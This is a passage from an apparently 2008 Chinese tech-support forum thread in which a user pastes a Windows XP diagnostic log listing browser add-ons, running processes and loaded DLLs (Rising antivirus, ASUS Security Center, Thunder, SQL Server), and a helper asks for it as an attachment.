{EEDD6FF9-13DE-496B-9A1C-D78B3215E266} <D:\Program Files\网络\迅雷5\Components\DownAndPlay\DapPlayer3.0.5712.71.267.dll, ShenZhen Thunder Networking Technologies Ltd.>
[XPPlayer Class]
{F3E70CEA-956E-49CC-B444-73AFE593AD7F} <C:\Program Files\Common Files\Thunder Network\KanKan\PPlayer.2.0.0.181.(267).dll, Xunlei Networking Technologies,LTD>
[XML DOM Document 3.0]
{F5078F32-C551-11D3-89B9-0000F81FE221} <C:\WINDOWS\system32\msxml3.dll, Microsoft Corporation>
[XML HTTP]
{F6D90F16-9C73-11D3-B32E-00C04F990BB4} <C:\WINDOWS\system32\msxml3.dll, Microsoft Corporation>
[Edit with Altova X&MLSpy]
<C:\Program Files\Altova\XMLSpy2005\spy.htm, N/A>
[Download with Thunder]
<D:\Program Files\网络\迅雷5\Program\geturl.htm, N/A>
[Download all links with Thunder]
<D:\Program Files\网络\迅雷5\Program\getallurl.htm, N/A>
[Export to Microsoft Office Excel(&X)]
<res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000, N/A>
[View current site ranking]
<http://alexa.chinaz.com/alexa.htm, N/A>
[Add to QQ Emoticons]
<D:\Program Files\网络\QQ\AddEmotion.htm, N/A>
1234567i - 2008-9-2 22:08:00
Continued
1234567i - 2008-9-2 22:09:00
==================================
Running processes
[PID: 536 / SYSTEM][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[PID: 596 / SYSTEM][\??\C:\WINDOWS\system32\csrss.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 624 / SYSTEM][\??\C:\WINDOWS\system32\winlogon.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2113)]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWLNPkg.dll] [Cognizance Corporation, 2.5.0.077]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\TrayIcon.dll] [Cognizance Corporation, 2.5.0.285]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\brand.dll] [ASUSTeK Computer Inc., 1.01.0.014]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\brand.dll] [ASUSTeK Computer Inc., 1.01.0.008]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ItMsg.dll] [Cognizance Corporation, 1.21.0.413]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AsChnl.dll] [Cognizance Corporation, 1.27.0.160]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItDAC.dll] [Cognizance Corporation, 1.00.317]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItReports.DLL] [Cognizance Corporation, 1.5.0.046]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\BioAuth.dll] [Cognizance Corporation, 2.5.0.306]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\BioAuth.dll] [Cognizance Corporation, 2.5.0.301]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASBioAT.dll] [Cognizance Corporation, 2.5.0.083]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCClient.dll] [Cognizance Corporation, 2.1.0.182]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AuthWiz.dll] [Cognizance Corporation, 2.5.0.558]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\AuthWiz.dll] [Cognizance Corporation, 2.5.0.538]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 668 / SYSTEM][C:\WINDOWS\system32\services.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\WINDOWS\AppPatch\AcAdProc.dll] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 680 / SYSTEM][C:\WINDOWS\system32\lsass.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2113)]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\ASWLNPkg.dll] [Cognizance Corporation, 2.5.0.077]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 852 / SYSTEM][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[c:\program files\asus security center\asus security protect manager\bin\aswlnpkg.dll] [Cognizance Corporation, 2.5.0.077]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[c:\program files\asus security center\asus security protect manager\bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[c:\program files\asus security center\asus security protect manager\bin\aschnl.dll] [Cognizance Corporation, 1.27.0.160]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\BioAuthSrv.dll] [Cognizance Corporation, 2.1.0.083]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItDAC.dll] [Cognizance Corporation, 1.00.317]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItReports.DLL] [Cognizance Corporation, 1.5.0.046]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCServer.dll] [Cognizance Corporation, 1.00.132]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCard.dll] [Cognizance Corporation, 1.01.173]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ItMsg.dll] [Cognizance Corporation, 1.21.0.413]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\brand.dll] [ASUSTeK Computer Inc., 1.01.0.014]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\brand.dll] [ASUSTeK Computer Inc., 1.01.0.008]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItAuth.dll] [Cognizance Corporation, 1.01.227]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AuthWiz.dll] [Cognizance Corporation, 2.5.0.558]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\AuthWiz.dll] [Cognizance Corporation, 2.5.0.538]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\NetAdmin.dll] [Cognizance Corporation, 1.5.0.178]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\NetAdmin.dll] [Cognizance Corporation, 1.5.0.177]
[PID: 876 / SYSTEM][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 936 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 1028 / SYSTEM][C:\Program Files\Rising\Rav\CCenter.exe] [Beijing Rising Information Technology Co., Ltd., 20.0.0.33]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 1068 / SYSTEM][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 1152 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 1284 / LOCAL SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[PID: 1336 / SYSTEM][C:\Program Files\Rising\Rfw\rfwsrv.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.0.76]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\Program Files\Rising\Rfw\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rfw\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\Program Files\Rising\Rfw\RfwRule.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[C:\Program Files\Rising\Rfw\rfwlog.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.16]
[C:\Program Files\Rising\Rfw\Rfwdrv.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.48]
[C:\Program Files\Rising\Rfw\ijt_ctrl.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\unvdet.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.8]
[C:\Program Files\Rising\Rfw\mPorts.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.6]
[PID: 1468 / SYSTEM][C:\Program Files\Rising\Rfw\rfwProxy.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.0.37]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\Program Files\Rising\Rfw\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RfwRule.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[C:\Program Files\Rising\Rfw\urlrule.dll] [Beijing Rising Information Technology Co., Ltd., 1.0.0.15]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\MonMid.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.6]
[PID: 1700 / SYSTEM][C:\Program Files\Rising\Rfw\rfwstub.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.0.12]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\Program Files\Rising\Rfw\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[PID: 264 / SYSTEM][C:\WINDOWS\system32\spoolsv.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-0852)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\mdimon.dll] [Microsoft Corporation, 11.3.8166.2]
[C:\WINDOWS\system32\tbtmon.dll] [TOSHIBA CORPORATION., 5, 0, 1208, 0]
[C:\WINDOWS\system32\TosBtHcrpAPI.dll] [TOSHIBA CORPORATION., 5, 0, 1201, 0]
[C:\WINDOWS\system32\TosBtAPI.dll] [TOSHIBA CORPORATION., 5.00.7615.0]
[C:\WINDOWS\system32\TosBdAPI.dll] [TOSHIBA CORPORATION., 4, 1, 1612, 0]
rainyblue - 2008-9-2 22:09:00
Please upload the log as an attachment...
1234567i - 2008-9-2 22:09:00
[C:\WINDOWS\system32\tbtmon98Language.dll] [TOSHIBA CORPORATION., 5, 0, 1204, 0]
[C:\WINDOWS\System32\spool\PRTPROCS\W32X86\mdippr.dll] [Microsoft Corporation, 11.3.8166.2]
[PID: 1020 / Administrator][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.5512 (xpsp.080413-2105)]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\PDFShell.dll] [Adobe Systems, Inc., 8.1.0.0]
[C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\PDFShell.CHS] [Adobe Systems, Inc., 8.0.0.0]
[C:\WINDOWS\system32\ieframe.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\WINDOWS\system32\nvcpl.dll] [NVIDIA Corporation, 6.14.11.5680]
[C:\WINDOWS\system32\NVRSZHC.DLL] [NVIDIA Corporation, 6.14.11.5680]
[C:\WINDOWS\system32\nvapi.dll] [NVIDIA Corporation, 6.14.11.5680]
[C:\WINDOWS\system32\nvshell.dll] [, ]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\WINDOWS\system32\WPDShServiceObj.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\PortableDeviceTypes.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\PortableDeviceApi.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\RavExt.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.18]
[D:\Program Files\网络\迅雷5\ComDlls\TDAtOnce_Now.dll] [Thunder Networking Technologies,LTD, 1.0.5.29]
[C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 8.0.0.2006102200]
[D:\Program Files\网络\迅雷5\ComDlls\xunleiBHO_Now.dll] [Thunder Networking Technologies,LTD, 5, 0, 8, 96]
[D:\Program Files\网络\迅雷5\Components\ResWorker\DsBho_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 20]
[D:\Program Files\网络\迅雷5\Components\ResWorker\DataProcessor_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 16]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItIEAddIn.dll] [Bioscrypt Inc., 2.1.078]
[C:\Program Files\Microsoft Office\OFFICE11\msohev.dll] [Microsoft Corporation, 11.0.5510]
[C:\Program Files\WinRAR\rarext.dll] [N/A, ]
[D:\Program Files\编程\ultraedit\ue32ctmn.dll] [, 1, 0, 0, 2]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Common Files\Adobe\Shell\PSICON.DLL] [Adobe Systems, Incorporated, 7.0]
[C:\WINDOWS\system32\dfshim.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\system32\mscoree.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Shfusion.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Fusion.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\culture.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\zh-CHS\ShFusRes.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[C:\PROGRA~1\MICROS~3\Wcesview.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\PROGRA~1\MICROS~3\pegconv.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\CEUTIL.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\RAPI.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\wpdshext.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\Audiodev.dll] [Microsoft Corporation, 5.2.5721.5145 (WMP_11.061018-2006)]
[C:\WINDOWS\system32\LinkDropHandler.dll] [Altova GmbH, 1, 0, 0, 7]
[C:\WINDOWS\system32\StkCWIA.dll] [Syntek America Inc., 1.0.0.2]
[PID: 1108 / Administrator][C:\Program Files\Rising\Rfw\RfwMain.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.1.70]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\Program Files\Rising\Rfw\RsGuiLib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
[C:\Program Files\Rising\Rfw\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rfw\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\Program Files\Rising\Rfw\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rfw\RfwCtrl.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\RsXML.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
[C:\Program Files\Rising\Rfw\PngDll.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\RfwRule.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[PID: 1304 / SYSTEM][C:\WINDOWS\system32\inetsrv\inetinfo.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-0852)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_filter.dll] [Microsoft Corporation, 2.0.50727.42 (RTM.050727-4200)]
[PID: 1748 / SYSTEM][C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\opends60.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlsort.dll] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\ums.dll] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\Resources\2052\sqlevn70.RLL] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SSNETLIB.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\SSmsLPCn.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\SSnmPN70.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Common Files\System\Ole DB\sqloledb.dll] [Microsoft Corporation, 2000.085.1132.00 (xpsp.080413-0852)]
[C:\PROGRA~1\MICROS~2\MSSQL\binn\xpsqlbot.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\odsole70.dll] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[PID: 196 / Administrator][C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AsGHost.exe] [Cognizance Corporation, 2.5.0.057]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWallet.dll] [Bioscrypt Inc., 2.0.0.110]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ASWallet.dll] [Bioscrypt Inc., 2.0.0.110]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItSSO.dll] [Cognizance Corporation, 2.5.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\RasAdmin.dll] [Cognizance Corporation, 1.5.0.028]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItReports.DLL] [Cognizance Corporation, 1.5.0.046]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\RasAdmin.dll] [Cognizance Corporation, 1.5.0.028]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\PkiAdmin.dll] [Cognizance Corporation, 1.5.0.025]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\brand.dll] [ASUSTeK Computer Inc., 1.01.0.014]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\brand.dll] [ASUSTeK Computer Inc., 1.01.0.008]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ItMsg.dll] [Cognizance Corporation, 1.21.0.413]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\PkiAdmin.dll] [Cognizance Corporation, 1.5.0.025]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCClient.dll] [Cognizance Corporation, 2.1.0.182]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItVCard.dll] [Cognizance Corporation, 1.01.173]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItAPS.dll] [Cognizance Corporation, 2.5.0.064]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\ItAPS.dll] [Cognizance Corporation, 2.5.0.063]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\TrayIcon.dll] [Cognizance Corporation, 2.5.0.285]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\BioAuth.dll] [Cognizance Corporation, 2.5.0.306]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\BioAuth.dll] [Cognizance Corporation, 2.5.0.301]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AsChnl.dll] [Cognizance Corporation, 1.27.0.160]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\NetAdmin.dll] [Cognizance Corporation, 1.5.0.178]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\NetAdmin.dll] [Cognizance Corporation, 1.5.0.177]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SSOMngr.dll] [Cognizance Corporation, 2.25.0.293]
